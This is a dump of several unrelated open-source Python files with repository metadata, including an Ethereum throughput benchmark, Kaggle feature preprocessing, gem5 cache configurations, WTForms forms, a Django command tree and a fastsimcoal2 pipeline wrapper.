return active_task
| [
"casey.durfee@saltbox.com"
] | casey.durfee@saltbox.com |
36285a335509b2e26d604c76af957f03339a6729 | e51642d571d1c30950782a47fdd8654e07dd9fb9 | /Ethereum/smallbank-throughput.py | 60993a33dba809743393aa71e0ef9c59167452c4 | [] | no_license | TimRi91/Distributed-Ledger-Testbench | 18e950d01737deb671dbb3484c4243f209ede2ac | f940ede242804fcbee47bae2aa6a83bf0091b54e | refs/heads/master | 2020-03-23T04:45:33.991871 | 2018-09-12T09:23:48 | 2018-09-12T09:23:48 | 141,103,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | import os
import time
from web3 import Web3
#----------------Set Variables----------------
#Testsetrate (#requests/sec)
n = 6
#Node
node = 'localnode'
#---------------------------------------------
#create .txt-file
filename = 'Smallbank_Throughput_Testset'+str(n)+'_'+str(time.strftime("%d-%m-%Y_%H-%M-%S"))+'.txt'
pathname = os.path.join('results', filename)
web3 = Web3(Web3.HTTPProvider("http://127.0.0.1:30311", request_kwargs={'timeout': 60}))
tBeginn=time.time()
while True:
if time.time()-tBeginn < 300:
iRate = 0
iStart=web3.eth.blockNumber
time.sleep(1.0 - ((time.time() - tBeginn) % 1.0))
iResult = web3.eth.blockNumber - iStart
for x in range(iResult):
iRate = iRate + web3.eth.getBlockTransactionCount(iStart+x+1)
print ('#tx/sec: ' + str(iRate))
with open(pathname, "a") as file:
file.write(str(iRate) + ' #tx/s \n')
file.close()
else:
break
print('Measurement finished')
| [
"noreply@github.com"
] | TimRi91.noreply@github.com |
35939d663896d25c64d3e144f07104d07d5f9c82 | 136475c7b1cf05241c45aa1228f7b9c50f16ab89 | /venv/Scripts/pip3.7-script.py | 61425625725ce2371b2c9463f18baff4c5c1d91f | [] | no_license | rachanakafle/Cows_and_Bulls_Game | 09f540027a795a06d7cd96c86235e8cfc461fb9a | bfd9495b47960bc9477cb0bdc2fa8d576c5d9a73 | refs/heads/master | 2020-04-13T05:18:14.116069 | 2018-12-24T12:20:12 | 2018-12-24T12:20:12 | 162,987,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | #!"C:\Users\Rachana Kafle\Desktop\Cows-and-Bulls\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.7'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.7')()
)
| [
"rachanakafle32@gmail.com"
] | rachanakafle32@gmail.com |
e9a7fec21d2cd66e4b6496833ff0f6019d382202 | b33c9f49ab3b0e9ab853c5ae5bad01a9a1349504 | /Processing/car.py | 91531a187ba737524759f4003b7e4f624b8eeaf5 | [] | no_license | raphaelbp12/Projeto-Final | cf5693b1824a2e660fc12c0630f8a40953c956d8 | ca722a5c42bd36d7fc77702218227e3204a69cb4 | refs/heads/master | 2021-01-23T07:34:27.339984 | 2017-11-02T00:03:44 | 2017-11-02T00:03:44 | 86,429,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,743 | py | from sensors import Sensors
from controlDistWall import ControlDistWall
class Car(object):
def __init__(self,x = 0,y = 0, theta = 0):
self.x = x
self.y = y
self.theta = radians(theta)
self.velLin = 0
self.velAng = 0
self.distFront = 0
self.distRight = 0
self.distLeft = 0
self.sensors = Sensors()
self.control = False
def initControl(self, KpAng, KpLin, circuitWeight):
self.control = ControlDistWall(KpAng, KpLin, circuitWeight)
def sense(self, wallsPoints, maxDist):
retPoints = []
for p in self.sensors.calcDistanceToWall(self.theta, wallsPoints, maxDist, self):
retPoints.append(p)
if len(retPoints) == 3:
self.distFront = retPoints[0][3]
self.distRight = retPoints[1][3]
self.distLeft = retPoints[2][3]
return retPoints
def move(self, velLin, velAng):
self.velLin = velLin
self.velAng = velAng
self.theta = self.theta + velAng
self.x = self.x + velLin*cos(self.theta)
self.y = self.y + velLin*sin(self.theta)
#print "x = "+str(self.x)+" y = "+str(self.y)+" theta = "+ str(self.theta) +" velLin = "+str(velLin)+" velAng = "+str(velAng)
def controlCar(self):
self.move(self.control.controlLinVel(self.distFront), self.control.controlAngVel(self.distRight, self.distLeft))
def display(self):
stroke(255,0,0)
velLin = self.velLin
if velLin < 30:
velLin = 30
line(self.x, self.y, self.x+velLin*cos(self.theta), self.y+velLin*sin(self.theta))
fill(255)
ellipse(self.x,self.y,10,10) | [
"raphaelbp12@gmail.com"
] | raphaelbp12@gmail.com |
492972e2ecb7185035cc667f45cc39a9357f364a | 415f5a763c7dd7a1881b32ab3d459e7779342d67 | /python/create_dataset_V2.py | 4b8a276ab3681bb1a8e691c09abd672e28e3c70d | [] | no_license | anuragreddygv323/kaggle-redhat | e6d35953dffbeecdd3de43c3fbc0a7b48df76dec | de85518c68aa8ff07d4cf6cab7c6a30ddb9ab5a6 | refs/heads/master | 2021-01-01T17:55:42.777586 | 2016-08-31T07:18:03 | 2016-08-31T07:18:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,214 | py | from sklearn.preprocessing import LabelEncoder
import pandas as pd
import numpy as np
import random
random.seed(2016)
def preprocess_acts(data, trainset = True):
data = data.drop(['activity_id'], axis=1)
columns = list(data.columns)
columns.remove('date')
if trainset:
columns.remove('outcome')
print "Processing dates"
data['tyear'] = data['date'].dt.year
data['tmonth'] = data['date'].dt.month
data['tyearweek'] = data['date'].dt.week
data['tday'] = data['date'].dt.day
## Split off from people_id
data['people_id'] = data['people_id'].apply(lambda x: x.split('_')[1])
data['people_id'] = pd.to_numeric(data['people_id']).astype(int)
# Convert strings to ints
for col in columns[1:]:
print "Processing", col
data[col] = data[col].fillna('type 0')
le = LabelEncoder()
data[col] = data.groupby(le.fit_transform(data[col]))[col].transform('count') / data.shape[0]
data['t_sum_true'] = data[columns[2:11]].sum(axis=1)
return data
def preprocess_people(data):
## Split off from people_id
data['people_id'] = data['people_id'].apply(lambda x: x.split('_')[1])
data['people_id'] = pd.to_numeric(data['people_id']).astype(int)
# Values in the people df is Booleans and Strings
columns = list(data.columns)
bools = columns[12:-1]
strings = columns[1:12]
strings.remove('date')
for col in bools:
print "Processing", col
data[col] = pd.to_numeric(data[col]).astype(int)
# Get the sum of positive results - not including 38
data['p_sum_true'] = data[bools[:-1]].sum(axis=1)
# Rather than turning them into ints which is fine for trees, lets develop response rates
# So they can be used in other models.
for col in strings:
data[col] = data[col].fillna('type 0')
le = LabelEncoder()
data[col] = data.groupby(le.fit_transform(data[col]))[col].transform('count') / data.shape[0]
print "Processing dates"
data['pyear'] = data['date'].dt.year
data['pmonth'] = data['date'].dt.month
data['pyearweek'] = data['date'].dt.week
data['pday'] = data['date'].dt.day
print "People processed"
return data
def read_test_train():
####### Build and save the datsets
print("Read people.csv...")
people = pd.read_csv("./input/people.csv",
dtype={'people_id': np.str,
'activity_id': np.str,
'char_38': np.int32},
parse_dates=['date'])
print("Load train.csv...")
train = pd.read_csv("./input/act_train.csv",
dtype={'people_id': np.str,
'activity_id': np.str,
'outcome': np.int8},
parse_dates=['date'])
id_train = train['activity_id']
print("Load test.csv...")
test = pd.read_csv("./input/act_test.csv",
dtype={'people_id': np.str,
'activity_id': np.str},
parse_dates=['date'])
id_test = test['activity_id']
# Preprocess each df
peeps = preprocess_people(people)
actions_train = preprocess_acts(train)
actions_test = preprocess_acts(test, trainset=False)
# Training
print "Merge Train set"
train = actions_train.merge(peeps, how='left', on='people_id')
train['activity_id'] = id_train
print "Merge Test set"
# Testing
test = actions_test.merge(peeps, how='left', on='people_id')
test['activity_id'] = id_test
# Play with dates:
train['days_diff'] = [int(i.days) for i in (train.date_x - train.date_y)]
test['days_diff'] = [int(i.days) for i in (test.date_x - test.date_y)]
# finally remove date vars:
train.drop(['date_x', 'date_y'], axis=1, inplace=True)
test.drop(['date_x', 'date_y'], axis=1, inplace=True)
return train, test
train, test= read_test_train()
print('Length of train: ', len(train))
print('Length of test: ', len(test))
train.to_csv("./input/xtrain_ds_v2.csv", index=False, header=True)
test.to_csv("./input/xtest_ds_v2.csv", index=False, header=True)
print "Done" | [
"michael.pearmain@gmail.com"
] | michael.pearmain@gmail.com |
a94cc410db3053720df1ce02d0a291ebb7d5ad00 | ebabbf75b7bcfbb8d22b3c3edb44b957878aaa4b | /src/fortypytons/Util.py | 586e25d575a69e7438fc58a54d5be4845eba844f | [] | no_license | tanuva/fortytons | dca736fdbe8e151a8eba2398a89ee3bc7408357e | 26ac2e99e1516ccc11492205ec370cb2af5818f3 | refs/heads/master | 2021-01-01T20:00:21.059323 | 2014-10-20T18:32:06 | 2014-10-20T18:32:06 | 2,162,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # -*- coding: utf-8 -*-
'''
Created on 26.02.2012
@author: marcel
'''
import math
from panda3d.bullet import BulletGhostNode
class Util:
@staticmethod
def getAbsolutePos(relPos, node):
""" Calculates the position of relPos (which is relative to node) relative to render (the origin). """
dummy = render.attachNewNode(BulletGhostNode())
dummy.setPos(node, relPos)
absPos = dummy.getPos()
return absPos
@staticmethod
def getDistance(first, second):
""" Calculates the distance between two Vec3 instances. """
# The sqrt of the sum ((Pi - Qi)^2)
return math.sqrt((first[0]-second[0])**2 + (first[1]-second[1])**2 + (first[2]-second[2])**2)
| [
"tanuva@nightsoul.org"
] | tanuva@nightsoul.org |
fbfa3f610397bf4050c5c75cc06b237878603097 | bb6017001fbaec2b0f858da3dc29a3963a7b37b3 | /AutoScript/caches/basic_caches_CacheSize_0.5.py | 0104b9cd7549f00225c6bbcaa56ea4069751445b | [
"MIT"
] | permissive | gabriel-lando/INF01113-gem5_Scripts | aeff71340e05e2c81ab3a2a2148a72cad3792ebb | 3a45c51aacaeafa2749043e3d54faff1c5ae5452 | refs/heads/master | 2020-06-10T22:44:37.881259 | 2019-06-27T08:21:49 | 2019-06-27T08:21:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | # -*- coding: utf-8 -*-
######################################################################
## Classes relacionadas às caches. Podem ser modificadas para alterar
## o tamanho (size), a associatividade (assoc), a latência no caso de
## hit (hit_latency) e a latência no caso de miss (response_latency) -
## ou seja, o tempo necessário para encaminhar a requisição ao proximo
## nível na hierarquia.
######################################################################
from m5.objects import Cache
class BasicL1ICache(Cache):
size = '32kB'
assoc = 8
tag_latency = 1
data_latency = 1
response_latency = 1
mshrs = 4
tgts_per_mshr = 16
def __init__(self, options=None):
super(BasicL1ICache, self).__init__()
pass
class BasicL1DCache(Cache):
size = '0.5kB'
assoc = 2
tag_latency = 1
data_latency = 2
response_latency = 2
mshrs = 4
tgts_per_mshr = 16
def __init__(self, latency):
super(BasicL1DCache, self).__init__()
self.data_latency = latency
pass
class BasicL2Cache(Cache):
size = '256kB'
assoc = 8
tag_latency = 8
data_latency = 12
response_latency = 4
mshrs = 16
tgts_per_mshr = 16
def __init__(self, options=None):
super(BasicL2Cache, self).__init__()
pass
class BasicL3Cache(Cache):
size = '2MB'
assoc = 16
tag_latency = 12
data_latency = 36
response_latency = 4
mshrs = 16
tgts_per_mshr = 16
def __init__(self, options=None):
super(BasicL3Cache, self).__init__()
pass
| [
"gabriellando@hotmail.com"
] | gabriellando@hotmail.com |
462380fa38921da7fcbe4172367723d74a2715c6 | 5d64ece6522498b3919bc11c4489978290ea4a38 | /module/forms.py | 4e1b7f45c424e1ca69b3a387632ee51c765caa86 | [] | no_license | wctsai20002/seleniumonitor | 6b601efb46568c904da5e00bc391e62373468592 | 0e49b7024fd39082e1174b2fd6cf4e9a6af7d115 | refs/heads/master | 2023-06-30T02:45:36.760400 | 2021-07-21T13:27:48 | 2021-07-21T13:27:48 | 382,865,240 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,885 | py | from wtforms import Form, BooleanField, StringField, PasswordField, validators, IntegerField, FloatField, fields, TextAreaField, Field
from wtforms import widgets
from wtforms.validators import ValidationError
from wtforms.fields import html5
class StringListField(StringField):
widget = widgets.TextArea()
def _value(self):
if self.data:
return '\n'.join(self.data)
else:
return u''
def process_formdata(self, valuelist):
if valuelist:
cleaned = list(filter(None, valuelist[0].split('\n')))
self.data = [x.strip() for x in cleaned]
else:
self.data = []
class SaltyPasswordField(StringField):
widget = widgets.PasswordInput()
encrypted_password = ''
def build_password(self, password):
import hashlib
import base64
import secrets
# Make a new salt on every new password and store it with the password
salt = secrets.token_bytes(32)
key = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
store = base64.b64encode(salt + key).decode('ascii')
return store
# incoming
def process_formdata(self, valuelist):
if valuelist:
# Be really sure it's non-zero in length
if len(valuelist[0].strip()) > 0:
self.encrypted_password = self.build_password(valuelist[0])
self.data = ''
else:
self.data = False
# Separated by key : value
class StringDictKeyValue(StringField):
widget = widgets.TextArea()
def _value(self):
if self.data:
output = u''
for k in self.data.keys():
output += '{}: {}\r\n'.format(k, self.data[k])
return output
else:
return u''
# incoming
def process_formdata(self, valuelist):
if valuelist:
self.data = {}
# Remove empty strings
cleaned = list(filter(None, valuelist[0].split('\n')))
for s in cleaned:
parts = s.strip().split(':')
if len(parts) == 2:
self.data.update({parts[0].strip(): parts[1].strip()})
else:
self.data = {}
class ListRegex(object):
def __init__(self, message=None):
self.message = message
def __call__(self, form, field):
import re
for line in field.data:
if line[0] == '/' and line[-1] == '/':
# Because internally we dont wrap in /
line = line.strip('/')
try:
re.compile(line)
except re.error:
message = field.gettext('RegEx \'%s\' is not a valid regular expression.')
raise ValidationError(message % (line))
class ContainerForm(Form):
url = html5.URLField('URL', [validators.URL(require_tld=False)])
title = StringField('Title')
tags = StringField('Tags', [validators.Optional(), validators.Length(max=35)])
interval = FloatField('Maximum time in seconds until recheck', [validators.Optional(), validators.NumberRange(min=1)])
css_selector = StringField('CSS Filter')
ignore_text = StringListField('Ignore Text', [ListRegex()])
notification_emails = StringListField('Notification Email')
headers = StringDictKeyValue('Request Headers')
trigger_notify = BooleanField('Send test notification on save')
class SettingForm(Form):
password = SaltyPasswordField()
interval = FloatField('Maximum time in seconds until recheck', [validators.NumberRange(min=1)])
extract_title_as_title = BooleanField('Extract <title> from document and use as watch title')
notification_emails = StringListField('Notification Email')
line_notify_token = StringField('Line Notify Token')
trigger_notify = BooleanField('Send test notification on save')
def populate_edit_form(form, web_container):
form.url.data = web_container.setting.url
form.title.data = web_container.setting.title
form.tags.data = ' '.join(web_container.setting.tags)
form.interval.data = web_container.setting.interval
form.css_selector.data = web_container.setting.css_selector
form.notification_emails.data = web_container.setting.notification_emails
def populate_setting_form(form, config, global_setting):
form.interval.data = global_setting.default_interval
form.extract_title_as_title.data = global_setting.extract_title
form.notification_emails.data = global_setting.mails
form.line_notify_token.data = make_hidden_token(global_setting.line_notify_token)
def make_hidden_token(token):
token_size = len(token)
start_index, end_index = int(token_size / 4), int(3 * token_size/ 4)
token = token[ : start_index] + '*' * (end_index - start_index) + token[end_index : ]
return token
| [
"wctsai20002@gmail.com"
] | wctsai20002@gmail.com |
c9b53f66d3414dd90a7fefc960bedfb59b1036e9 | 8f6e48d414a410acc1a4919be9a0366366f98944 | /backend/event/apps.py | 23ea13300b6b6a94ab67d09a7b8b4c020a8bfef7 | [] | no_license | lyf2000/events | 04bf7d6886edb77bbd7895860ca710d1a58ea524 | 001f2d3172be12268c87e5bcc1e9d4d59331f751 | refs/heads/master | 2022-11-11T10:39:51.704848 | 2020-07-04T04:08:58 | 2020-07-04T04:08:58 | 274,938,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | from django.apps import AppConfig
class BlogConfig(AppConfig):
name = 'event'
| [
"lyf2000@mail.ru"
] | lyf2000@mail.ru |
d1540c7319640ae2f754884f48d21e93116dfca5 | 8b0991e44dc5e10dc361bfa6afaad600fe04a212 | /classes/command/commandTree.py | b5d2972efdd9d09cf8969924150983b77de9b9e8 | [] | no_license | Cubiss/discord_bot | f3fd52eed075434bdd22de8e3ce1cdc42e0ba592 | 08686e067c4f9e0d2dc15c2c710c4eaf68694704 | refs/heads/master | 2023-06-24T08:37:32.900290 | 2023-06-11T22:20:50 | 2023-06-11T22:20:50 | 187,587,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,344 | py | import discord
import re
from classes.command.command import Command
from modules.users.users import Users
class CommandTree(Command):
def __init__(self, names: list, children: list, permissions=None, description=''):
try:
self.children = {}
_names = set()
for c in children:
for n in c.names:
if n in _names:
raise Exception(f"Duplicate subcommand name: {n}")
_names.add(n)
self.children[c.name] = c
# self.regex = self.update_regexp()
super(CommandTree, self).__init__(
names=names, function=self.execute_branching, permissions=permissions, description=description)
pass
except Exception as ex:
raise Exception(f"CommandTree({self.name})")
def update_regexp(self):
c: Command
children_names_regexes = []
for subcommand_name, c in self.children.items():
children_names_regexes.append(rf'(?P<{subcommand_name}>{"|".join(c.names)})')
return re.compile(
rf'(?P<command_name>{"|".join(self.names)})\s*(?P<subcommand>({"|".join(children_names_regexes)}).*)')
async def execute_branching(self, subcommand, message: discord.Message, client: discord.Client, users: Users, log, **kwargs):
for subcommand_name in self.children:
if kwargs[subcommand_name] is not None:
return await self.children[subcommand_name].execute(message=message, client=client, users=users, log=log,
text=subcommand)
def build_usage(self):
return f'Allowed commands: {self.name} ({"|".join(self.children)})'
async def send_help(self, message: discord.Message, names=None):
if names is not None and len(names) > 0:
name = names.pop(0)
for c in self.children.values():
if name in c.names:
return await c.send_help(message, names)
return await super().send_help(message)
def __repr__(self):
if self.names is None or len(self.names) == 0:
return f'<CommandTree() - uninitialized'
else:
return f'<CommandTree({self.name}) -> {repr(self.function)}>'
| [
"solin.jakub@gmail.com"
] | solin.jakub@gmail.com |
38e9ee343a79aadeb93fccf44df6b0895b4e837d | 0c437b16688cf5fd313c9fcb5ca68f6c9d4be1c1 | /virtualenv/bin/django-admin.py | acdcb95312250ee956decfa2ad9d3bdbb3e8d1b5 | [
"Apache-2.0"
] | permissive | piyush82/icclab-rcb-web | 53e81da8584cb1802de97f31b8dc9328c48445f9 | 4391a15ddfa73f5236246cb64fcb4216dff31816 | refs/heads/master | 2021-01-23T03:47:50.339450 | 2014-04-17T13:11:16 | 2014-04-17T13:11:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | #!/Users/harh/Codes/Python/icclab-web/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"piyush.harsh@zhaw.ch"
] | piyush.harsh@zhaw.ch |
eea2209be92efd6a1637b8c110f3b87c6d9745e2 | 7154f9167ba8fca747ee2ae983ed2467949164a3 | /run_tests.py | 8117072484c1aff7ce07769e0eb63bfb77e073dd | [] | no_license | bel-lloyd/weather-project | e641a0631d14c661123614906dd47373d95cfcfd | 28f4174d710fb82529727adf42184ccb5cd19c53 | refs/heads/main | 2023-07-09T11:23:57.056896 | 2021-08-07T02:09:10 | 2021-08-07T02:09:10 | 392,278,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,096 | py | import unittest
from tests.test_convert_date import ConvertDateTests
from tests.test_convert_f_to_c import ConvertTempTests
from tests.test_calculate_mean import CalculateMeanTests
from tests.test_load_data_from_csv import LoadCSVTests
from tests.test_find_min import FindMinTests
from tests.test_find_max import FindMaxTests
from tests.test_generate_summary import GenerateSummaryTests
from tests.test_generate_daily_summary import GenerateDailySummaryTests
runner = unittest.TextTestRunner()
print("Running Tests...\n")
runner.run(unittest.TestSuite((unittest.makeSuite(ConvertDateTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(ConvertTempTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(CalculateMeanTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(LoadCSVTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(FindMinTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(FindMaxTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(GenerateSummaryTests))))
runner.run(unittest.TestSuite((unittest.makeSuite(GenerateDailySummaryTests))))
| [
"noreply@github.com"
] | bel-lloyd.noreply@github.com |
b1c959b0d7a3308bebf69ca2c44f5048ccea40be | 57d3aae331ff9f9907800a36eaff6c0f689b4217 | /Script files/Paprika.py | a33ef0628a985325e1660aaf158b425cd9db4b53 | [] | no_license | carolinelennartsson/PopulationGeneticsGroup6 | ceba82ae9cb08e144355833960ed9d0173874449 | 39bcc430f1dd5701f4b98d79b9136e39649a1497 | refs/heads/main | 2023-03-29T20:12:25.027102 | 2021-04-09T11:54:30 | 2021-04-09T11:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,987 | py | #!/usr/bin/env python
# Import libraries.
import os
import argparse
# Get input arguments.
parser = argparse.ArgumentParser()
# Create input arguements.
parser.add_argument("-par", "--param_file", help="Input parameter file for fastsimcoal2" )
parser.add_argument("-i", "--iter_num", help="Number of iterations to use for fastsimcoal2")
# Collect arguments.
args = parser.parse_args()
# Run fastsimcoal2.
os.system("fsc26 -i {parameters} -n {iterations} -I -s 0 -d -T".format(parameters=args.param_file, iterations=args.iter_num))
# Delete the seed file.
os.system("rm seed.txt")
# Create SFS plots
obs_file = args.param_file.split('.')[-2].split('/')[-1]
os.system("Rscript plot_sfs.R --path ./{obs}/{obs}_DAFpop0.obs --id {obs}".format(obs=obs_file))
os.system("mv sfs_{obs}.png ../Results/".format(obs=obs_file))
# Create stairway summary.
os.system("bash ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/version02/script/stairway.sh ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Scripts/{obs}/{obs}_DAFpop0.obs ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Results 10000000 {obs} {iterations} ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Parameters/parameter.txt".format(obs=obs_file, iterations=args.iter_num))
# Collect the final summaries over all the runs.
try:
os.system("mkdir ../Results/{}_summaries".format(obs_file))
except:
pass
#
for i in range(1, int(args.iter_num)+1):
os.system("cp ../Results/{o}.{it}/{o}.{it}.final.summary ../Results/{o}_summaries/".format(o=obs_file, it=i))
os.system("Rscript ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Scripts/plot_stairway_ggplot.R --inputpath ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Results/{obs_file}_summaries/ --outputfilename ~/groupdirs/SCIENCE-BIO-popgen_course-project/Group6_Simulations1/Results/{obs_file}_summaries/{obs_file} --title {obs_file}".format(obs_file=obs_file))
| [
"noreply@github.com"
] | carolinelennartsson.noreply@github.com |
ae9c18ed187a23fb7121a34ca1422020e3f7ddb5 | 20343e8a8435b3f839d5abd0c4063cf735f43341 | /Experiment/CornerDetectAndAutoEmail/AveMaxMinDetect/test/test1.py | c4133dfbbcbb80c2cf4a4201fd7522e512561360 | [] | no_license | alading241/MoDeng | 948f2099e2f7e4548d6e477b6e06b833bdf4f9bb | 01819e58943d7d1a414714d64aa531c0e99dfe22 | refs/heads/master | 2021-05-23T11:39:41.326804 | 2020-04-05T06:06:01 | 2020-04-05T06:06:01 | 253,269,397 | 1 | 0 | null | 2020-04-05T15:38:33 | 2020-04-05T15:38:33 | null | UTF-8 | Python | false | false | 476 | py | # encoding = utf-8
import tornado
from apscheduler.schedulers.tornado import TornadoScheduler
sched = TornadoScheduler()
""" 测试向任务中传入参数 """
test = 'hello'
def job1(a, b, c):
print("job1:", a,b,c)
def job2(a, b, c):
print("job2:", a,b,c)
sched.add_job(job1, 'interval', seconds=1, args=["e", "t", "f"])
sched.add_job(job2, 'interval', seconds=1, kwargs={"a": test, "b": "b", "c": "c"})
sched.start()
tornado.ioloop.IOLoop.instance().start()
| [
"1210055099@qq.com"
] | 1210055099@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.